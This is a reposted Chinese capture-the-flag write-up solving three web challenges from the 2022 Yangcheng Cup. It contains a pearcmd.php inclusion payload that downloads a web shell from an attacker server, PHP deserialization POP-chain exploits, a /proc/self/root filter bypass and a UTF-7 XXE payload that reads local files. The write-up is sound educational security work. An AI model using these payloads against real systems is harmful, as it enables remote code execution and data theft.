[PHP知识库] 2022羊城杯 web三题

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> 2022羊城杯 web三题 -> 正文阅读

[PHP知识库]2022羊城杯 web三题

0x01?WEB-rce_me

源码：

考核docker php裸文件包含

<?php
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
     $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
         foreach($blacklist as $blackword){
           if(stristr($var, $blackword)) return False;
    }
    return True;
}  
if(fliter($_SERVER["QUERY_STRING"]))
{
include $file;
}
else
{
die("Noooo0");
}

fliter($_SERVER["QUERY_STRING"]

对参数file进行了过滤。

这里$_SERVER["QUERY_STRING"]可以进行url编码，绕过黑名单的检测。因为$_SERVER["QUERY_STRING"]不会url解码，而直接进行黑名单检测

对于文件包含可以给利用pearcmd.php来文件包含。

常用的三种姿势：

+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php
?file=/usr/local/lib/php/pearcmd.php&aaa+install+-R+/var/www/html/+http://vps:port/shell.php
?file=/usr/local/lib/php/pearcmd.php&+download+http://vps:port/shell.php

但是过滤了create、install等关键词。所以选择情况三，编码最少的情况。

payload:

/usr/local/lib/php/%70earcmd.php&+download+http://xxx.xxx.xxx.xxx:1234/shell.php

在vps存放一个shell，启动http服务。

此时可以用蚁剑去连接。

进去之后是没有权限读根目录下的flag，需要提权。

查看suid看到date有root权限就利用date来读取。

flag{19926412505647790428982600739977}

0x02:

WEB-step_by_step-v3

考察pop链反序列化、 include_once、js、xxe绕过

<?php
error_reporting(0);
class yang
{
    public $y1;


    public function __construct()
    {
        $this->y1->magic();
    }


    public function __tostring()
    {
        ($this->y1)();
    }


    public function hint()
    {
        include_once('hint.php');
        if(isset($_GET['file']))
        {
            $file = $_GET['file'];
            if(preg_match("/$hey_mean_then/is", $file))
            {
                die("nonono");
            }
            include_once($file);
        }
    }
}


class cheng
{
    public $c1;


    public function __wakeup()
    {
        $this->c1->flag = 'flag';
    }


    public function __invoke()
    {
        $this->c1->hint();
    }
}


class bei
{
    public $b1;
    public $b2;


    public function __set($k1,$k2)
    {
        print $this->b1;
    }


    public function __call($n1,$n2)
    {
        echo $this->b1;
    }
}


if (isset($_POST['ans'])) {
    unserialize($_POST['ans']);
} else {
    highlight_file(__FILE__);
}
?>

?先触发wake_up,利用$this->c1->flag 我们可以使得c1为class bei的实例化对象，当c1对象没有flag这个属性的时候就会去调用 __set这个函数，此时我们可以让 class bei 的b1为class yang 的实例化对象，使得可以调用__tostring方法，如果我们让y1为class cheng的实例化对象，（$this->y1）()当尝试调用一个函数的方式调用一个对象时会自动触发_invoke.最后让clas cheng的c1为class yang就可以成功执行到hint函数。

cheng::__wakeup()->bei::__set()->yang::__toString()->cheng::__invoke()->yang::hint()
<?php
var_dump("");
class yang
{
    public $y1;
}
class cheng
{
    public $c1;
}


class bei
{
    public $b1;
    public $b2;  
}
$a = new cheng();
$a->c1 = new bei();
$a->c1->b1 = new yang();
$a->c1->b1->y1 = new cheng();
$a->c1->b1->y1->c1 = new yang();
echo serialize($a);
?>

打上payload就可以文件读取，在/etc/passwd 发现疑似flag的文件fl4449g，当然不能直接读取。

根据源码，还存在一个hint.php文件，因为存在include_once('hint.php')，只能包括一次，所以要想办法去绕过。

网上普遍的payload:

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

?但是还是过滤/var/www/html 。这里再一个小绕过，把最后面的root改为cwd.

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/hint.php

拿到hint的源码：

<?php
$hey_mean_then = "\.\.\/|var|www|html|conf|lmx|decode|expect|http|https|data|glob|phar|host|g$|[0-3]|[7-9]|~|\*|\?| |\_|%|\^|\"|\'|\||\`|{|}|<|>|;|\(|\)";
//dHJ5IC8xOTE5ODEwNDE1NDEx
?>

再一个base64解码可获得提示。try /1919810415411

?这波广告打的好.....

登录抓包，但是啥也没抓到，应该是前端校验。在js文件中找到登录密码

登录之后就来到了：

要post上传xml。普通的<!ENTITY 、<!DOCTYPE http data等关键词都有被过滤，

?所以构造读flag的payload:

<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE xxe +AFs-
+ADwAIQ-ELEMENT name ANY +AD4-
+ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///fl44449g+ACI- +AD4AXQA+-
+ADw-root+AD4-
+ADw-name+AD4AJg-xxe+ADsAPA-/name+AD4-
+ADw-/root+AD4-

flag藏在tag后面base64解密即可获得。

flag{78876541095201823251015152416700}

0x03

WEB-Safepop

考的原题：

[原创]利用PHP垃圾回收机制构造POP链-CTF对抗-看雪论坛-安全社区|安全招聘|bbs.pediy.com

exp:

<?php
class Fun{
    private $func;
    public function __construct(){
    $this->func = [new Test,'getFlag'];//也可以写为$this->func = "Test::getFlag";这样由于没有实例化Test类，还不会触发Test里的__wakeup()
    }
}
 
class Test{
    public function getFlag(){
    }
}
 
class A{
    public $a;
}
 
class B{
    public $p;
}
 
$Test = new Test;
$Fun = new Fun;
$a = new A;
$b = new B;
$a->a = $Fun;
$b->a = $a;
 
$r = serialize($b);
$r1 = str_replace('"Fun":1:','"Fun":2:',$r);
echo urlencode($r1);